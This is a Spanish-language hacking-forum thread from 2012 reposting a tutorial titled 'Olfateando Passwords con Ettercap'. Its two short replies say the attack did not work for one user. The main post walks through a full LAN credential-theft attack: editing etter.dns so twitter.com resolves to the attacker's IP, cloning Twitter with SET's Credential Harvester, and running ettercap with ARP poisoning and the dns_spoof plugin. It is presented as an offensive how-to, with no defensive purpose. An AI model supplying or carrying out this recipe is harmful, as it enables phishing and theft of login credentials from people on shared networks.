Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: REC en Mayo 25, 2012, 03:04:58 PM

Título: Olfateando Passwords con Ettercap
Publicado por: REC en Mayo 25, 2012, 03:04:58 PM

Olfateando Passwords con Ettercap por Intruder-T23

Introducción:
Este tipo de ataque consiste en envenenar el DNS de una red LAN. Cuando alguien de la intranet entra en algún website (en su navegador la víctima coloca la página web exactamente como es, por ejemplo, este coloca "www.twitter.com") e introduce su nombre de usuario y password, esta información llega a la computadora del atacante, quien se encuentra olfateando la red.

Datos Basicos:
Distro: Backtrack 5
Herramientas: Ettercap y SET (Social-Engineer Toolkit).
Tipo de Ataque: Olfateo y Envenenamiento de DNS (DNS Poisoning).
Resultados Obtenidos: Nombre de usuario y password.

Configurando etter:
En la terminal, se teclean los siguientes comandos:

CitarA. ifconfig
B. locate etter.dns
C. nano /usr/local/share/ettercap/etter.dns


Descripción de comandos:
A. Se teclea "ifconfig" para ver la dirección IP local de la computadora atacante, la cual es 192.168.1.104. También se ve la interfaz de la tarjeta wireless, la cual es wlan0.
B. Se teclea "locate etter.dns" para localizar el directorio del archivo etter.dns.
C. Se usa el comando "nano" mas el directorio del archivo etter.dns para así poder editarlo.

Archivo Etter.dns:
Aquí se añaden las siguientes líneas:
Citartwitter.com       A 192.168.1.104
*.twitter.com     A 192.168.1.104
www.twitter.com   A 192.168.1.104
 

Twitter.com es el website donde la víctima introducirá su nombre de usuario y password. Como pueden ver, también hay que introducir la dirección IP de la PC atacante. Una vez que se llenan los datos, para guardar los cambios se debe teclear lo siguiente: "control+x" (Ctrl más la tecla x), luego se teclea "y", y finalmente "enter".

Social-Engineer Toolkit (SET):

Después de realizar los cambios en el archivo etter.dns, se teclea el símbolo del dragón para ir a: Backtrack>>Explotation Tools>>Social Engineering Tools>>set

Dentro de SET, se teclea:
1) Social Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner

Dentro de SET, se coloca el website y queda de la siguiente forma:

CitarEnter the url to clone: www.twitter.com

Y se teclea la tecla enter para dejar el website falso corriendo en el puerto 80...

Ettercap:
En la consola, se teclea:

Citarettercap -T -q -l wlan0 -P dns_spoof -M arp // //

Finalmente, cuando la víctima entra a la página web e introduce su nombre de usuario y password, la información llega a la computadora del atacante. En el video, el nombre de usuario es "internaut" y el password es "password123".

Descarga del Video Tutorial de buena calidad:

http://www.filefactory.com/file/2577oxhg4ay7/n/ettercap_MP4_by_Intruder-T23.mp4

Mala calidad :(








Fuente : http://foro.el-hacker.com/f60/video-olfateando-passwords-con-ettercap-por-intruder-t23-340827/


sa sa sa ludos  ;D
Título: Re:Olfateando Passwords con Ettercap
Publicado por: xc0d3 en Mayo 26, 2012, 02:23:41 PM
aun sirve el dns spoof?
Título: Re:Olfateando Passwords con Ettercap
Publicado por: REC en Mayo 26, 2012, 05:47:46 PM
Citaraun sirve el dns spoof?

Hola, pues el vídeo fue lanzado resien el 15/05/2012  con el post .  (aunque bro seria divertido si lo intentases y nos cuentes como te fue )  salu2
Título: Re:Olfateando Passwords con Ettercap
Publicado por: xc0d3 en Mayo 27, 2012, 12:28:35 PM
m claro lo intente pero no funciona no pasa nada en el ethercap me sale que esta redirecionando pero entreo al navegador y no pasa nada xD"